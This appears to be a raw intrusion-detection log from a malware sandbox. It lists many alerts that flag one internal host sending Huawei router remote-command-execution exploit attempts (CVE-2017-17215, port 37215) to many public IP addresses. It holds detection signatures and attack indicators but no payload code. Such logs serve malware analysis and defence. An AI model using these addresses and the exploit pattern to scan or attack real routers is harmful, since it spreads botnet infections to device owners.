                                                    07/10/24-08:27:24.975422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852237215192.168.2.1441.192.43.110
                                                    07/10/24-08:27:08.339309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834437215192.168.2.14157.148.46.0
                                                    07/10/24-08:27:27.177890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.14157.158.116.201
                                                    07/10/24-08:27:33.764510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269437215192.168.2.14157.44.112.197
                                                    07/10/24-08:27:17.000608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927237215192.168.2.14191.192.44.253
                                                    07/10/24-08:26:59.651235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397437215192.168.2.1432.238.171.95
                                                    07/10/24-08:27:30.514840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4058637215192.168.2.1478.215.78.120
                                                    07/10/24-08:27:07.337893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014437215192.168.2.1474.24.181.228
                                                    07/10/24-08:26:28.795318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095837215192.168.2.14197.11.15.58
                                                    07/10/24-08:27:03.030502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044037215192.168.2.14157.65.11.228
                                                    07/10/24-08:26:11.127756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730037215192.168.2.1441.216.51.31
                                                    07/10/24-08:26:59.637493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3691837215192.168.2.14197.157.125.33
                                                    07/10/24-08:26:20.126065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624037215192.168.2.1438.32.95.106
                                                    07/10/24-08:26:33.247201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492837215192.168.2.14197.132.70.25
                                                    07/10/24-08:26:47.746309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822437215192.168.2.14197.71.103.228
                                                    07/10/24-08:27:20.519262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772237215192.168.2.14157.108.236.28
                                                    07/10/24-08:26:52.063686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4300637215192.168.2.14129.148.62.187
                                                    07/10/24-08:27:22.772225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370037215192.168.2.14157.219.35.158
                                                    07/10/24-08:26:28.911509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214237215192.168.2.1493.249.7.96
                                                    07/10/24-08:26:48.019858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827237215192.168.2.1441.229.87.249
                                                    07/10/24-08:27:02.977576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3589837215192.168.2.14197.32.228.215
                                                    07/10/24-08:26:47.983815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415037215192.168.2.1441.89.180.191
                                                    07/10/24-08:27:22.838933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144837215192.168.2.14157.230.126.102
                                                    07/10/24-08:26:20.182114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515437215192.168.2.1441.254.10.138
                                                    07/10/24-08:26:53.186613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775237215192.168.2.14157.169.36.198
                                                    07/10/24-08:27:03.004303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5782237215192.168.2.14189.59.163.183
                                                    07/10/24-08:26:11.088418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637237215192.168.2.14197.140.67.38
                                                    07/10/24-08:27:10.632991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5260637215192.168.2.14157.100.89.109
                                                    07/10/24-08:27:33.934356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4539437215192.168.2.1441.177.230.41
                                                    07/10/24-08:26:25.451839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752637215192.168.2.14217.125.151.243
                                                    07/10/24-08:26:48.007312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797837215192.168.2.14157.185.4.66
                                                    07/10/24-08:27:30.409560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973237215192.168.2.1441.149.34.89
                                                    07/10/24-08:26:15.796224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700637215192.168.2.1488.189.147.181
                                                    07/10/24-08:26:28.931862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4416437215192.168.2.14157.159.25.104
                                                    07/10/24-08:26:43.793102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563037215192.168.2.14157.49.244.6
                                                    07/10/24-08:27:17.061013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4522837215192.168.2.1441.239.70.56
                                                    07/10/24-08:26:42.463923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611637215192.168.2.14157.39.189.18
                                                    07/10/24-08:27:05.164451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5609437215192.168.2.14197.85.224.230
                                                    07/10/24-08:26:55.451906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688437215192.168.2.14157.103.9.66
                                                    07/10/24-08:27:30.423950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658037215192.168.2.14157.25.10.75
                                                    07/10/24-08:26:14.811319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671237215192.168.2.14197.247.241.224
                                                    07/10/24-08:27:17.056962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240237215192.168.2.14197.199.199.147
                                                    07/10/24-08:27:28.154911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296037215192.168.2.1441.193.212.65
                                                    07/10/24-08:27:20.484132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4019037215192.168.2.1441.104.57.172
                                                    07/10/24-08:26:18.015608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5097037215192.168.2.1441.205.25.71
                                                    07/10/24-08:26:18.037621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958037215192.168.2.14121.57.27.141
                                                    07/10/24-08:26:14.816680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899437215192.168.2.14157.17.199.191
                                                    07/10/24-08:26:36.366890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636837215192.168.2.14157.102.23.229
                                                    07/10/24-08:27:11.489140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356237215192.168.2.1441.190.177.41
                                                    07/10/24-08:27:07.281440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699637215192.168.2.1441.53.65.223
                                                    07/10/24-08:26:53.176697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4502437215192.168.2.14197.254.92.79
                                                    07/10/24-08:26:18.027380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3988237215192.168.2.14157.162.253.11
                                                    07/10/24-08:26:15.812623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088437215192.168.2.1460.118.235.104
                                                    07/10/24-08:26:43.582733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5133437215192.168.2.14157.6.21.117
                                                    07/10/24-08:26:59.655987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882637215192.168.2.14157.185.106.37
                                                    07/10/24-08:27:19.309217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3367037215192.168.2.14157.220.187.38
                                                    07/10/24-08:26:55.302858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4387037215192.168.2.1441.183.112.56
                                                    07/10/24-08:26:22.295095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485837215192.168.2.14157.84.240.170
                                                    07/10/24-08:27:28.130365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805237215192.168.2.14176.143.144.91
                                                    07/10/24-08:27:02.749504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398237215192.168.2.1441.77.220.242
                                                    07/10/24-08:26:57.505236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3703437215192.168.2.14197.7.199.153
                                                    07/10/24-08:27:17.103998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607837215192.168.2.14197.99.220.241
                                                    07/10/24-08:26:43.781564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948637215192.168.2.1441.126.194.244
                                                    07/10/24-08:27:33.831803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4631837215192.168.2.1441.225.109.57
                                                    07/10/24-08:26:47.919508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6063237215192.168.2.1441.244.45.54
                                                    07/10/24-08:26:34.197956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4464037215192.168.2.1441.160.198.8
                                                    07/10/24-08:26:43.880984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233237215192.168.2.14197.225.69.238
                                                    07/10/24-08:27:33.931783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4579237215192.168.2.14197.83.55.238
                                                    07/10/24-08:26:49.898002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753637215192.168.2.14186.55.100.100
                                                    07/10/24-08:27:19.251231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684037215192.168.2.1448.67.183.111
                                                    07/10/24-08:26:47.754938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623237215192.168.2.14157.30.181.60
                                                    07/10/24-08:27:10.621432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871837215192.168.2.14157.132.240.88
                                                    07/10/24-08:27:11.527013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038037215192.168.2.1441.72.235.23
                                                    07/10/24-08:27:19.151496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743637215192.168.2.14197.180.113.85
                                                    07/10/24-08:26:17.941159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130237215192.168.2.1441.242.188.127
                                                    07/10/24-08:27:27.080218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5090037215192.168.2.14148.147.96.23
                                                    07/10/24-08:26:49.822276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174237215192.168.2.14197.199.199.46
                                                    07/10/24-08:27:02.838823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378237215192.168.2.14197.64.105.51
                                                    07/10/24-08:26:25.420167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3580237215192.168.2.14157.75.244.31
                                                    07/10/24-08:26:13.758860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058837215192.168.2.14157.161.174.38
                                                    07/10/24-08:26:42.461757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927437215192.168.2.1441.81.1.59
                                                    07/10/24-08:27:22.898943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3610237215192.168.2.14157.107.25.126
                                                    07/10/24-08:27:07.384814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867837215192.168.2.14157.13.199.140
                                                    07/10/24-08:26:28.914881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3646037215192.168.2.1441.162.172.67
                                                    07/10/24-08:26:29.866986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760637215192.168.2.14157.17.78.243
                                                    07/10/24-08:26:33.231891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4107037215192.168.2.1439.22.125.154
                                                    07/10/24-08:27:07.384931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441237215192.168.2.14197.157.134.244
                                                    07/10/24-08:26:45.668696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753237215192.168.2.1441.60.3.185
                                                    07/10/24-08:26:29.790374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232037215192.168.2.14157.125.221.9
                                                    07/10/24-08:26:28.789449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850237215192.168.2.14157.233.33.39
                                                    07/10/24-08:26:29.813463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836837215192.168.2.14157.5.150.232
                                                    07/10/24-08:27:22.802348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5776037215192.168.2.1472.210.8.108
                                                    07/10/24-08:26:25.514525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785037215192.168.2.14197.102.127.168
                                                    07/10/24-08:26:33.166033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981237215192.168.2.1441.96.107.193
                                                    07/10/24-08:26:53.176697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776237215192.168.2.1419.180.65.167
                                                    07/10/24-08:27:10.772266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726637215192.168.2.1441.235.33.38
                                                    07/10/24-08:27:34.117875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298237215192.168.2.14157.47.116.196
                                                    07/10/24-08:26:43.857526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177437215192.168.2.1441.252.131.195
                                                    07/10/24-08:26:47.749012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560437215192.168.2.1441.65.239.94
                                                    07/10/24-08:27:28.134313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021037215192.168.2.1441.238.245.165
                                                    07/10/24-08:26:20.157992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4787437215192.168.2.14115.161.209.177
                                                    07/10/24-08:26:26.598533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878837215192.168.2.14157.207.125.231
                                                    07/10/24-08:26:57.644790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064437215192.168.2.14157.196.59.165
                                                    07/10/24-08:26:31.090625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491637215192.168.2.14157.249.125.64
                                                    07/10/24-08:27:23.896326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839637215192.168.2.1441.148.177.99
                                                    07/10/24-08:26:43.561007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4950837215192.168.2.14197.64.156.220
                                                    07/10/24-08:26:14.825440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4002037215192.168.2.1485.40.141.71
                                                    07/10/24-08:26:28.777569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545437215192.168.2.14157.91.192.20
                                                    07/10/24-08:26:31.090801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033037215192.168.2.14157.73.146.108
                                                    07/10/24-08:26:43.792602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3375437215192.168.2.14197.60.157.51
                                                    07/10/24-08:26:49.774026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636637215192.168.2.1468.86.133.143
                                                    07/10/24-08:26:26.562262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465637215192.168.2.14157.253.230.150
                                                    07/10/24-08:26:34.242902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748637215192.168.2.14197.125.159.173
                                                    07/10/24-08:26:41.285291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374037215192.168.2.14157.65.101.14
                                                    07/10/24-08:27:19.265818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736637215192.168.2.14197.220.90.186
                                                    07/10/24-08:27:31.566998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746437215192.168.2.1464.227.228.118
                                                    07/10/24-08:26:22.284234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584237215192.168.2.14157.251.155.112
                                                    07/10/24-08:26:42.415895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073437215192.168.2.14157.108.71.79
                                                    07/10/24-08:27:05.113927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835037215192.168.2.1441.242.29.128
                                                    07/10/24-08:26:25.496138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432637215192.168.2.14197.11.230.178
                                                    07/10/24-08:27:31.483215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4103637215192.168.2.14157.12.167.194
                                                    07/10/24-08:27:33.881615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346637215192.168.2.14197.195.61.43
                                                    07/10/24-08:27:19.301991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3742437215192.168.2.14197.191.22.199
                                                    07/10/24-08:27:33.867801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5404837215192.168.2.1441.173.221.192
                                                    07/10/24-08:26:38.608013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188237215192.168.2.14157.118.74.94
                                                    07/10/24-08:27:10.739921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4731437215192.168.2.14197.73.84.67
                                                    07/10/24-08:26:28.652077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559037215192.168.2.1441.37.223.187
                                                    07/10/24-08:26:13.795210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542637215192.168.2.1441.218.142.246
                                                    07/10/24-08:26:53.127595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689037215192.168.2.1441.67.88.139
                                                    07/10/24-08:27:08.389213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4950037215192.168.2.14197.36.89.116
                                                    07/10/24-08:27:17.013307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777437215192.168.2.1441.174.138.244
                                                    07/10/24-08:27:14.881343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734837215192.168.2.14197.94.122.185
                                                    07/10/24-08:26:45.597110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595837215192.168.2.1490.112.181.236
                                                    07/10/24-08:27:33.880415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3898437215192.168.2.14157.182.13.224
                                                    07/10/24-08:26:33.231077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3580637215192.168.2.14157.109.220.40
                                                    07/10/24-08:27:27.161744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873037215192.168.2.14197.206.124.124
                                                    07/10/24-08:27:19.145981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4429237215192.168.2.1457.32.100.208
                                                    07/10/24-08:26:33.265037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484637215192.168.2.14157.121.100.213
                                                    07/10/24-08:27:20.414993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663237215192.168.2.1441.159.93.150
                                                    07/10/24-08:26:22.275935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4497437215192.168.2.1497.218.55.3
                                                    07/10/24-08:27:02.702208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437837215192.168.2.14197.34.221.176
                                                    07/10/24-08:27:10.629706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066237215192.168.2.14105.229.144.195
                                                    07/10/24-08:26:22.294435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266037215192.168.2.1441.35.162.182
                                                    07/10/24-08:26:38.637224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679037215192.168.2.14157.133.199.6
                                                    07/10/24-08:26:15.869789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838837215192.168.2.14197.29.85.96
                                                    07/10/24-08:27:13.815716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901237215192.168.2.1441.56.109.70
                                                    07/10/24-08:27:14.793732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5347237215192.168.2.14197.183.4.136
                                                    07/10/24-08:27:22.548548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264437215192.168.2.1441.25.201.247
                                                    07/10/24-08:27:32.569954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476237215192.168.2.14126.98.74.165
                                                    07/10/24-08:27:28.169904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699437215192.168.2.14197.175.56.247
                                                    07/10/24-08:27:31.570253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554237215192.168.2.14197.124.58.101
                                                    07/10/24-08:26:11.599014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410637215192.168.2.14146.131.158.186
                                                    07/10/24-08:26:25.433410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024237215192.168.2.14197.196.180.45
                                                    07/10/24-08:27:02.796781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819037215192.168.2.14197.212.122.223
                                                    07/10/24-08:27:17.033866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325237215192.168.2.14197.0.61.61
                                                    07/10/24-08:26:15.840335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305037215192.168.2.14157.135.20.192
                                                    07/10/24-08:26:20.148886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3279837215192.168.2.1441.215.175.140
                                                    07/10/24-08:27:13.850530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569237215192.168.2.14157.96.73.178
                                                    07/10/24-08:26:51.975524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492637215192.168.2.14135.179.56.190
                                                    07/10/24-08:26:51.939250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621837215192.168.2.1418.191.142.129
                                                    07/10/24-08:26:28.927122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4069837215192.168.2.1441.55.76.203
                                                    07/10/24-08:26:11.186644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214037215192.168.2.14157.50.56.249
                                                    07/10/24-08:26:20.116732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432037215192.168.2.1441.252.106.156
                                                    07/10/24-08:26:31.054322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3635437215192.168.2.14177.124.208.119
                                                    07/10/24-08:26:41.395852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407637215192.168.2.1441.91.89.159
                                                    07/10/24-08:26:52.050509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467237215192.168.2.1441.236.240.1
                                                    07/10/24-08:26:25.523012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641037215192.168.2.1479.80.250.47
                                                    07/10/24-08:27:30.416774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3784637215192.168.2.14157.221.6.160
                                                    07/10/24-08:26:26.595344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3647037215192.168.2.1470.134.195.218
                                                    07/10/24-08:26:38.630697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339637215192.168.2.14146.195.246.242
                                                    07/10/24-08:27:05.163542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3681637215192.168.2.14173.178.255.30
                                                    07/10/24-08:26:42.404478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5988837215192.168.2.14197.163.81.112
                                                    07/10/24-08:26:28.754764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264237215192.168.2.14157.31.89.157
                                                    07/10/24-08:26:52.024313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362237215192.168.2.14207.221.212.17
                                                    07/10/24-08:26:14.801295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705637215192.168.2.14157.32.78.64
                                                    07/10/24-08:26:41.551601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630037215192.168.2.14103.0.193.160
                                                    07/10/24-08:26:55.405669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3872837215192.168.2.14197.221.216.184
                                                    07/10/24-08:27:22.818188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5638637215192.168.2.14197.5.207.107
                                                    07/10/24-08:27:27.037222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063637215192.168.2.1441.106.60.230
                                                    07/10/24-08:26:52.020493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822037215192.168.2.14202.1.248.106
                                                    07/10/24-08:27:22.919171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499037215192.168.2.14157.39.222.112
                                                    07/10/24-08:26:38.632510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5320437215192.168.2.1441.118.196.76
                                                    07/10/24-08:27:05.109463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304037215192.168.2.1477.194.221.5
                                                    07/10/24-08:27:19.271140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370037215192.168.2.1462.2.243.208
                                                    07/10/24-08:26:22.285937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458437215192.168.2.14157.247.23.101
